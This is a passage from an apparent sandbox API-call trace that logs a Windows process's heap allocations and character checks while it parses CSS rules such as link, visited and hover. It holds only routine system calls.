(HeapHandle=0x450000, Flags=0x0, Size=0x72) returned 0x4622a0 [0113.082] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0xf8) returned 0x4bda00 [0113.082] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x8b4) returned 0x4c06a8 [0113.082] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4b9fc8 [0113.082] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x450000) returned 1 [0113.082] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4b9fe0 [0113.082] IsCharSpaceW (wch=0xd) returned 1 [0113.082] IsCharSpaceW (wch=0xd) returned 1 [0113.082] IsCharSpaceW (wch=0xa) returned 1 [0113.082] IsCharSpaceW (wch=0x62) returned 0 [0113.082] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.082] IsCharSpaceW (wch=0x20) returned 1 [0113.082] IsCharSpaceW (wch=0x7b) returned 0 [0113.082] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd2b8 [0113.082] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.082] IsCharSpaceW (wch=0x20) returned 1 [0113.083] IsCharAlphaNumericW (ch=0x7b) returned 0 [0113.083] IsCharSpaceW (wch=0xd) returned 1 [0113.083] IsCharSpaceW (wch=0xd) returned 1 [0113.083] IsCharSpaceW (wch=0xa) returned 1 [0113.083] IsCharSpaceW (wch=0x9) returned 1 [0113.083] IsCharSpaceW (wch=0x77) returned 0 [0113.083] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4910f8 | out: hHeap=0x450000) returned 1 [0113.083] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.083] IsCharSpaceW (wch=0x3a) returned 0 [0113.083] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x4ba7f0 [0113.083] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.083] IsCharSpaceW (wch=0x20) returned 1 [0113.083] IsCharSpaceW (wch=0x31) returned 0 [0113.083] IsCharAlphaNumericW (ch=0x31) returned 1 [0113.083] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.083] IsCharSpaceW (wch=0x25) returned 0 [0113.083] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.083] IsCharSpaceW (wch=0x3b) returned 0 [0113.083] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.083] IsCharSpaceW (wch=0xd) returned 1 [0113.083] IsCharSpaceW (wch=0xd) returned 1 [0113.083] IsCharSpaceW (wch=0xa) returned 1 [0113.083] IsCharSpaceW (wch=0x9) returned 1 [0113.083] IsCharSpaceW (wch=0x68) returned 0 [0113.084] IsCharSpaceW (wch=0x25) returned 0 [0113.084] IsCharSpaceW (wch=0x31) returned 0 [0113.084] IsCharSpaceW (wch=0x31) returned 0 [0113.084] IsCharSpaceW (wch=0x25) returned 0 [0113.084] IsCharSpaceW (wch=0x31) returned 0 [0113.084] IsCharSpaceW (wch=0x25) returned 0 [0113.084] IsCharSpaceW (wch=0x0) returned 0 [0113.084] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd2d8 [0113.084] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab720 [0113.084] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.084] IsCharSpaceW (wch=0x3a) returned 0 [0113.084] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.084] IsCharSpaceW (wch=0x20) returned 1 [0113.084] IsCharSpaceW (wch=0x31) returned 0 [0113.084] IsCharAlphaNumericW (ch=0x31) returned 1 [0113.084] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.084] IsCharSpaceW (wch=0x25) returned 0 [0113.084] IsCharAlphaNumericW (ch=0x25) returned 0 [0113.084] IsCharSpaceW (wch=0x3b) returned 0 [0113.084] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.084] IsCharSpaceW (wch=0xd) returned 1 [0113.084] IsCharSpaceW (wch=0xd) returned 1 [0113.085] IsCharSpaceW (wch=0xa) returned 1 [0113.085] IsCharSpaceW (wch=0x20) returned 1 [0113.085] IsCharSpaceW (wch=0x9) returned 1 [0113.085] IsCharSpaceW (wch=0x6d) returned 0 [0113.085] IsCharSpaceW (wch=0x25) returned 0 [0113.085] IsCharSpaceW (wch=0x31) returned 0 [0113.085] IsCharSpaceW (wch=0x31) returned 0 [0113.085] IsCharSpaceW (wch=0x25) returned 0 [0113.085] IsCharSpaceW (wch=0x31) returned 0 [0113.085] IsCharSpaceW (wch=0x25) returned 0 [0113.085] IsCharSpaceW (wch=0x0) returned 0 [0113.085] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.085] IsCharSpaceW (wch=0x20) returned 1 [0113.085] IsCharSpaceW (wch=0x3a) returned 0 [0113.085] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.085] IsCharSpaceW (wch=0x20) returned 1 [0113.085] IsCharSpaceW (wch=0x30) returned 0 [0113.085] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.085] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.085] IsCharSpaceW (wch=0x3b) returned 0 [0113.085] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.086] IsCharSpaceW (wch=0xd) returned 1 [0113.086] IsCharSpaceW (wch=0xd) returned 1 [0113.086] IsCharSpaceW (wch=0xa) returned 1 [0113.086] IsCharSpaceW (wch=0x9) returned 1 [0113.086] IsCharSpaceW (wch=0x70) returned 0 [0113.109] IsCharSpaceW (wch=0x30) returned 0 [0113.110] IsCharSpaceW (wch=0x30) returned 0 [0113.110] IsCharSpaceW (wch=0x30) returned 0 [0113.110] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4) returned 0x4a70a0 [0113.110] IsCharSpaceW (wch=0x30) returned 0 [0113.110] IsCharSpaceW (wch=0x30) returned 0 [0113.110] IsCharSpaceW (wch=0x0) returned 0 [0113.110] IsCharSpaceW (wch=0x30) returned 0 [0113.110] IsCharSpaceW (wch=0x30) returned 0 [0113.110] IsCharSpaceW (wch=0x30) returned 0 [0113.110] IsCharSpaceW (wch=0x30) returned 0 [0113.110] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4ab720, Size=0x60) returned 0x4a98a0 [0113.110] IsCharSpaceW (wch=0x30) returned 0 [0113.110] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a70a0 | out: hHeap=0x450000) returned 1 [0113.111] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.111] IsCharSpaceW (wch=0x20) returned 1 [0113.111] IsCharSpaceW (wch=0x3a) returned 0 [0113.111] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.111] IsCharSpaceW (wch=0x20) returned 1 [0113.111] IsCharSpaceW (wch=0x30) returned 0 [0113.111] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.111] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.111] IsCharSpaceW (wch=0x3b) returned 0 [0113.111] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.111] IsCharSpaceW (wch=0xd) returned 1 [0113.111] IsCharSpaceW (wch=0xd) returned 1 [0113.111] IsCharSpaceW (wch=0xa) returned 1 [0113.111] IsCharSpaceW (wch=0x9) returned 1 [0113.111] IsCharSpaceW (wch=0x62) returned 0 [0113.111] IsCharSpaceW (wch=0x30) returned 0 [0113.111] IsCharSpaceW (wch=0x30) returned 0 [0113.111] IsCharSpaceW (wch=0x30) returned 0 [0113.111] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x4) returned 0x4a70a0 [0113.111] IsCharSpaceW (wch=0x30) returned 0 [0113.111] IsCharSpaceW (wch=0x30) returned 0 [0113.111] IsCharSpaceW (wch=0x0) returned 0 [0113.111] IsCharSpaceW (wch=0x30) returned 0 [0113.111] IsCharSpaceW (wch=0x30) returned 0 [0113.111] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4a98a0, Size=0x90) returned 0x4c0f68 [0113.112] IsCharSpaceW (wch=0x30) returned 0 [0113.112] IsCharSpaceW (wch=0x30) returned 0 [0113.112] IsCharSpaceW (wch=0x30) returned 0 [0113.112] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4c0f68, Size=0xd0) returned 0x4c0f68 [0113.112] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4a70a0 | out: hHeap=0x450000) returned 1 [0113.112] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.112] IsCharSpaceW (wch=0x20) returned 1 [0113.112] IsCharSpaceW (wch=0x3a) returned 0 [0113.112] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.112] IsCharSpaceW (wch=0x20) returned 1 [0113.112] IsCharSpaceW (wch=0x23) returned 0 [0113.112] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.112] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.112] IsCharSpaceW (wch=0x3b) returned 0 [0113.112] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.112] IsCharSpaceW (wch=0xd) returned 1 [0113.113] IsCharSpaceW (wch=0xd) returned 1 [0113.113] IsCharSpaceW (wch=0xa) returned 1 [0113.113] IsCharSpaceW (wch=0x9) returned 1 [0113.113] IsCharSpaceW (wch=0x63) returned 0 [0113.113] IsCharSpaceW (wch=0x31) returned 0 [0113.113] IsCharSpaceW (wch=0x23) returned 0 [0113.113] IsCharSpaceW (wch=0x23) returned 0 [0113.113] IsCharSpaceW (wch=0x31) returned 0 [0113.113] IsCharSpaceW (wch=0x23) returned 0 [0113.113] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.113] IsCharSpaceW (wch=0x20) returned 1 [0113.113] IsCharSpaceW (wch=0x3a) returned 0 [0113.113] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.113] IsCharSpaceW (wch=0x20) returned 1 [0113.113] IsCharSpaceW (wch=0x23) returned 0 [0113.113] IsCharAlphaNumericW (ch=0x23) returned 0 [0113.113] IsCharAlphaNumericW (ch=0x30) returned 1 [0113.113] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.113] IsCharSpaceW (wch=0x3b) returned 0 [0113.113] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.113] IsCharSpaceW (wch=0xd) returned 1 [0113.114] IsCharSpaceW (wch=0xd) returned 1 [0113.114] IsCharSpaceW (wch=0xa) returned 1 [0113.114] IsCharSpaceW (wch=0x20) returned 1 [0113.114] IsCharSpaceW (wch=0x7d) returned 0 [0113.114] IsCharSpaceW (wch=0x30) returned 0 [0113.114] IsCharSpaceW (wch=0x23) returned 0 [0113.114] IsCharSpaceW (wch=0x23) returned 0 [0113.114] IsCharSpaceW (wch=0x30) returned 0 [0113.114] IsCharSpaceW (wch=0x23) returned 0 [0113.114] IsCharAlphaNumericW (ch=0x7d) returned 0 [0113.114] IsCharSpaceW (wch=0xd) returned 1 [0113.114] IsCharSpaceW (wch=0xd) returned 1 [0113.114] IsCharSpaceW (wch=0xa) returned 1 [0113.114] IsCharSpaceW (wch=0xd) returned 1 [0113.114] IsCharSpaceW (wch=0xd) returned 1 [0113.114] IsCharSpaceW (wch=0xa) returned 1 [0113.114] IsCharSpaceW (wch=0x61) returned 0 [0113.114] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4b9ff8 [0113.114] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4ba010 [0113.114] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.114] IsCharSpaceW (wch=0x3a) returned 0 [0113.114] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd2f8 [0113.114] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.114] IsCharSpaceW (wch=0x61) returned 0 [0113.114] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.115] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.115] IsCharSpaceW (wch=0x20) returned 1 [0113.115] IsCharSpaceW (wch=0x7b) returned 0 [0113.115] lstrlenW (lpString="active") returned 6 [0113.115] lstrlenW (lpString="visited") returned 7 [0113.115] lstrlenW (lpString="hover") returned 5 [0113.115] lstrlenW (lpString="link") returned 4 [0113.115] StrCmpNICW (lpStr1="link", lpStr2="link", nChar=4) returned 0 [0113.115] IsCharSpaceW (wch=0x20) returned 1 [0113.115] IsCharAlphaNumericW (ch=0x7b) returned 0 [0113.115] IsCharSpaceW (wch=0xd) returned 1 [0113.115] IsCharSpaceW (wch=0xd) returned 1 [0113.115] IsCharSpaceW (wch=0xa) returned 1 [0113.115] IsCharSpaceW (wch=0x9) returned 1 [0113.115] IsCharSpaceW (wch=0x66) returned 0 [0113.115] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4910f8 | out: hHeap=0x450000) returned 1 [0113.115] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.115] IsCharSpaceW (wch=0x20) returned 1 [0113.115] IsCharSpaceW (wch=0x3a) returned 0 [0113.115] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x4ba8b8 [0113.115] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.115] IsCharSpaceW (wch=0x20) returned 1 [0113.115] IsCharSpaceW (wch=0x31) returned 0 [0113.115] IsCharAlphaNumericW (ch=0x31) returned 1 [0113.115] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.116] IsCharSpaceW (wch=0x20) returned 1 [0113.116] IsCharSpaceW (wch=0x41) returned 0 [0113.116] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.116] IsCharSpaceW (wch=0x2c) returned 0 [0113.116] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.116] IsCharSpaceW (wch=0x67) returned 0 [0113.116] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.116] IsCharSpaceW (wch=0x2c) returned 0 [0113.116] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.116] IsCharSpaceW (wch=0x68) returned 0 [0113.116] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.116] IsCharSpaceW (wch=0x3b) returned 0 [0113.116] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.116] IsCharSpaceW (wch=0x20) returned 1 [0113.116] IsCharSpaceW (wch=0xd) returned 1 [0113.116] IsCharSpaceW (wch=0xd) returned 1 [0113.116] IsCharSpaceW (wch=0xa) returned 1 [0113.116] IsCharSpaceW (wch=0x9) returned 1 [0113.116] IsCharSpaceW (wch=0x63) returned 0 [0113.116] IsCharSpaceW (wch=0x61) returned 0 [0113.116] IsCharSpaceW (wch=0x31) returned 0 [0113.116] IsCharSpaceW (wch=0x31) returned 0 [0113.116] IsCharSpaceW (wch=0x61) returned 0 [0113.116] bsearch (_Key=0x22f03c, _Base=0x73d35220, _NumOfElements=0x9, _SizeOfElements=0x8, _PtFuncCompare=0x73d14c66) returned 0x0 [0113.116] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x38) returned 0x48ec90 [0113.116] IsCharSpaceW (wch=0x31) returned 0 [0113.116] IsCharSpaceW (wch=0x31) returned 0 [0113.116] IsCharSpaceW (wch=0x30) returned 0 [0113.117] IsCharSpaceW (wch=0x70) returned 0 [0113.117] IsCharSpaceW (wch=0x74) returned 0 [0113.117] IsCharSpaceW (wch=0x20) returned 1 [0113.117] IsCharSpaceW (wch=0x31) returned 0 [0113.117] IsCharSpaceW (wch=0x70) returned 0 [0113.117] IsCharSpaceW (wch=0x31) returned 0 [0113.117] IsCharSpaceW (wch=0x70) returned 0 [0113.117] IsCharSpaceW (wch=0x74) returned 0 [0113.117] IsCharSpaceW (wch=0x0) returned 0 [0113.117] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd318 [0113.117] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab720 [0113.117] IsCharSpaceW (wch=0x20) returned 1 [0113.117] IsCharSpaceW (wch=0x41) returned 0 [0113.117] IsCharSpaceW (wch=0x6e) returned 0 [0113.117] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2e) returned 0x4aab88 [0113.117] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4ab720, Size=0x60) returned 0x4a98a0 [0113.117] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x48ec90 | out: hHeap=0x450000) returned 1 [0113.117] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.117] IsCharSpaceW (wch=0x3a) returned 0 [0113.117] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.117] IsCharSpaceW (wch=0x20) returned 1 [0113.118] IsCharSpaceW (wch=0x77) returned 0 [0113.118] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.118] IsCharSpaceW (wch=0x3b) returned 0 [0113.118] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.118] IsCharSpaceW (wch=0x20) returned 1 [0113.118] IsCharSpaceW (wch=0xd) returned 1 [0113.118] IsCharSpaceW (wch=0xd) returned 1 [0113.118] IsCharSpaceW (wch=0xa) returned 1 [0113.118] IsCharSpaceW (wch=0x7d) returned 0 [0113.118] IsCharSpaceW (wch=0x65) returned 0 [0113.118] IsCharSpaceW (wch=0x77) returned 0 [0113.118] IsCharSpaceW (wch=0x77) returned 0 [0113.118] IsCharSpaceW (wch=0x65) returned 0 [0113.118] IsCharAlphaW (ch=0x77) returned 1 [0113.118] IsCharAlphaW (ch=0x68) returned 1 [0113.118] IsCharAlphaW (ch=0x69) returned 1 [0113.118] IsCharAlphaW (ch=0x74) returned 1 [0113.119] IsCharAlphaW (ch=0x65) returned 1 [0113.119] bsearch (_Key=0x22f0e0, _Base=0x73d14c80, _NumOfElements=0x93, _SizeOfElements=0x8, _PtFuncCompare=0x73d14c66) returned 0x73d150f8 [0113.120] IsCharSpaceW (wch=0x77) returned 0 [0113.120] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4a98a0, Size=0x90) returned 0x4c1040 [0113.120] IsCharAlphaNumericW (ch=0x7d) returned 0 [0113.120] IsCharSpaceW (wch=0xd) returned 1 [0113.120] IsCharSpaceW (wch=0xd) returned 1 [0113.120] IsCharSpaceW (wch=0xa) returned 1 [0113.120] IsCharSpaceW (wch=0xd) returned 1 [0113.120] IsCharSpaceW (wch=0xd) returned 1 [0113.120] IsCharSpaceW (wch=0xa) returned 1 [0113.120] IsCharSpaceW (wch=0x7d) returned 0 [0113.120] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x10) returned 0x4ba028 [0113.120] IsCharAlphaNumericW (ch=0x7d) returned 0 [0113.120] IsCharSpaceW (wch=0xd) returned 1 [0113.120] IsCharSpaceW (wch=0xd) returned 1 [0113.120] IsCharSpaceW (wch=0xa) returned 1 [0113.120] IsCharSpaceW (wch=0x61) returned 0 [0113.120] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.120] IsCharSpaceW (wch=0x3a) returned 0 [0113.120] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd338 [0113.120] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.120] IsCharSpaceW (wch=0x61) returned 0 [0113.121] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.121] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.121] IsCharSpaceW (wch=0x20) returned 1 [0113.121] IsCharSpaceW (wch=0x7b) returned 0 [0113.121] lstrlenW (lpString="active") returned 6 [0113.121] lstrlenW (lpString="visited") returned 7 [0113.121] StrCmpNICW (lpStr1="visited", lpStr2="visited", nChar=7) returned 0 [0113.121] IsCharSpaceW (wch=0x20) returned 1 [0113.121] IsCharAlphaNumericW (ch=0x7b) returned 0 [0113.121] IsCharSpaceW (wch=0x20) returned 1 [0113.121] IsCharSpaceW (wch=0xd) returned 1 [0113.121] IsCharSpaceW (wch=0xd) returned 1 [0113.121] IsCharSpaceW (wch=0xa) returned 1 [0113.121] IsCharSpaceW (wch=0x9) returned 1 [0113.121] IsCharSpaceW (wch=0x66) returned 0 [0113.121] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4910f8 | out: hHeap=0x450000) returned 1 [0113.121] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.121] IsCharSpaceW (wch=0x20) returned 1 [0113.121] IsCharSpaceW (wch=0x3a) returned 0 [0113.121] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x4ba8e0 [0113.121] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.121] IsCharSpaceW (wch=0x20) returned 1 [0113.121] IsCharSpaceW (wch=0x31) returned 0 [0113.121] IsCharAlphaNumericW (ch=0x31) returned 1 [0113.121] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.121] IsCharSpaceW (wch=0x20) returned 1 [0113.121] IsCharSpaceW (wch=0x41) returned 0 [0113.121] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.121] IsCharSpaceW (wch=0x2c) returned 0 [0113.122] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.122] IsCharSpaceW (wch=0x67) returned 0 [0113.122] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.122] IsCharSpaceW (wch=0x2c) returned 0 [0113.122] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.122] IsCharSpaceW (wch=0x68) returned 0 [0113.122] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.122] IsCharSpaceW (wch=0x3b) returned 0 [0113.122] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.122] IsCharSpaceW (wch=0xd) returned 1 [0113.122] IsCharSpaceW (wch=0xd) returned 1 [0113.122] IsCharSpaceW (wch=0xa) returned 1 [0113.122] IsCharSpaceW (wch=0x9) returned 1 [0113.122] IsCharSpaceW (wch=0x63) returned 0 [0113.122] IsCharSpaceW (wch=0x61) returned 0 [0113.122] IsCharSpaceW (wch=0x31) returned 0 [0113.122] IsCharSpaceW (wch=0x31) returned 0 [0113.122] IsCharSpaceW (wch=0x61) returned 0 [0113.122] bsearch (_Key=0x22f03c, _Base=0x73d35220, _NumOfElements=0x9, _SizeOfElements=0x8, _PtFuncCompare=0x73d14c66) returned 0x0 [0113.122] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x38) returned 0x48ec90 [0113.122] IsCharSpaceW (wch=0x31) returned 0 [0113.122] IsCharSpaceW (wch=0x31) returned 0 [0113.122] IsCharSpaceW (wch=0x30) returned 0 [0113.122] IsCharSpaceW (wch=0x70) returned 0 [0113.122] IsCharSpaceW (wch=0x74) returned 0 [0113.122] IsCharSpaceW (wch=0x20) returned 1 [0113.122] IsCharSpaceW (wch=0x31) returned 0 [0113.122] IsCharSpaceW (wch=0x70) returned 0 [0113.122] IsCharSpaceW (wch=0x31) returned 0 [0113.122] IsCharSpaceW (wch=0x70) returned 0 [0113.123] IsCharSpaceW (wch=0x74) returned 0 [0113.123] IsCharSpaceW (wch=0x0) returned 0 [0113.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd358 [0113.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab720 [0113.123] IsCharSpaceW (wch=0x20) returned 1 [0113.123] IsCharSpaceW (wch=0x41) returned 0 [0113.123] IsCharSpaceW (wch=0x6e) returned 0 [0113.123] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x2e) returned 0x4aabc0 [0113.123] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4ab720, Size=0x60) returned 0x4a98a0 [0113.123] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x48ec90 | out: hHeap=0x450000) returned 1 [0113.123] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.123] IsCharSpaceW (wch=0x3a) returned 0 [0113.123] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.123] IsCharSpaceW (wch=0x20) returned 1 [0113.123] IsCharSpaceW (wch=0x77) returned 0 [0113.123] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.123] IsCharSpaceW (wch=0x3b) returned 0 [0113.123] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.123] IsCharSpaceW (wch=0x20) returned 1 [0113.123] IsCharSpaceW (wch=0xd) returned 1 [0113.124] IsCharAlphaW (ch=0x77) returned 1 [0113.124] IsCharAlphaW (ch=0x68) returned 1 [0113.124] IsCharAlphaW (ch=0x69) returned 1 [0113.124] IsCharAlphaW (ch=0x74) returned 1 [0113.124] IsCharAlphaW (ch=0x65) returned 1 [0113.124] bsearch (_Key=0x22f0e0, _Base=0x73d14c80, _NumOfElements=0x93, _SizeOfElements=0x8, _PtFuncCompare=0x73d14c66) returned 0x73d150f8 [0113.124] RtlReAllocateHeap (Heap=0x450000, Flags=0x0, Ptr=0x4a98a0, Size=0x90) returned 0x4c10d8 [0113.124] IsCharAlphaNumericW (ch=0x7d) returned 0 [0113.124] IsCharAlphaNumericW (ch=0x7d) returned 0 [0113.124] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.124] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x18) returned 0x4bd378 [0113.124] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x50) returned 0x4910f8 [0113.124] IsCharSpaceW (wch=0x61) returned 0 [0113.124] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.124] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.124] IsCharSpaceW (wch=0x20) returned 1 [0113.125] IsCharSpaceW (wch=0x7b) returned 0 [0113.125] lstrlenW (lpString="active") returned 6 [0113.125] lstrlenW (lpString="visited") returned 7 [0113.125] lstrlenW (lpString="hover") returned 5 [0113.125] StrCmpNICW (lpStr1="hover", lpStr2="hover", nChar=5) returned 0 [0113.125] IsCharSpaceW (wch=0x20) returned 1 [0113.125] IsCharAlphaNumericW (ch=0x7b) returned 0 [0113.125] IsCharSpaceW (wch=0xd) returned 1 [0113.125] IsCharSpaceW (wch=0xd) returned 1 [0113.125] IsCharSpaceW (wch=0xa) returned 1 [0113.125] IsCharSpaceW (wch=0x66) returned 0 [0113.125] HeapFree (in: hHeap=0x450000, dwFlags=0x0, lpMem=0x4910f8 | out: hHeap=0x450000) returned 1 [0113.125] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.125] IsCharSpaceW (wch=0x20) returned 1 [0113.125] IsCharSpaceW (wch=0x3a) returned 0 [0113.125] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x1c) returned 0x4ba908 [0113.125] IsCharAlphaNumericW (ch=0x3a) returned 0 [0113.125] IsCharSpaceW (wch=0x20) returned 1 [0113.125] IsCharSpaceW (wch=0x31) returned 0 [0113.125] IsCharAlphaNumericW (ch=0x31) returned 1 [0113.125] IsCharAlphaNumericW (ch=0x20) returned 0 [0113.125] IsCharSpaceW (wch=0x20) returned 1 [0113.125] IsCharSpaceW (wch=0x41) returned 0 [0113.125] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.125] IsCharSpaceW (wch=0x2c) returned 0 [0113.125] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.125] IsCharSpaceW (wch=0x67) returned 0 [0113.125] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.125] IsCharSpaceW (wch=0x2c) returned 0 [0113.125] IsCharAlphaNumericW (ch=0x2c) returned 0 [0113.125] IsCharSpaceW (wch=0x68) returned 0 [0113.125] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.126] IsCharSpaceW (wch=0x3b) returned 0 [0113.126] IsCharAlphaNumericW (ch=0x3b) returned 0 [0113.126] IsCharSpaceW (wch=0xd) returned 1 [0113.126] IsCharSpaceW (wch=0xd) returned 1 [0113.126] IsCharSpaceW (wch=0xa) returned 1 [0113.126] IsCharSpaceW (wch=0x63) returned 0 [0113.126] IsCharSpaceW (wch=0x61) returned 0 [0113.126] IsCharSpaceW (wch=0x31) returned 0 [0113.126] IsCharSpaceW (wch=0x31) returned 0 [0113.126] IsCharSpaceW (wch=0x61) returned 0 [0113.126] bsearch (_Key=0x22f03c, _Base=0x73d35220, _NumOfElements=0x9, _SizeOfElements=0x8, _PtFuncCompare=0x73d14c66) returned 0x0 [0113.126] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x38) returned 0x48ec90 [0113.126] IsCharSpaceW (wch=0x31) returned 0 [0113.126] IsCharSpaceW (wch=0x31) returned 0 [0113.126] IsCharSpaceW (wch=0x30) returned 0 [0113.126] IsCharSpaceW (wch=0x70) returned 0 [0113.126] IsCharSpaceW (wch=0x74) returned 0 [0113.126] IsCharSpaceW (wch=0x20) returned 1 [0113.126] IsCharSpaceW (wch=0x31) returned 0 [0113.126] IsCharSpaceW (wch=0x70) returned 0 [0113.126] IsCharSpaceW (wch=0x31) returned 0 [0113.126] IsCharSpaceW (wch=0x70) returned 0 [0113.126] IsCharSpaceW (wch=0x74) returned 0 [0113.126] IsCharSpaceW (wch=0x0) returned 0 [0113.126] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x14) returned 0x4bd398 [0113.126] RtlAllocateHeap (HeapHandle=0x450000, Flags=0x0, Size=0x40) returned 0x4ab720 [0113.126] IsCharSpaceW (wch=0x20) returned 1 [0113.127] IsCharSpaceW 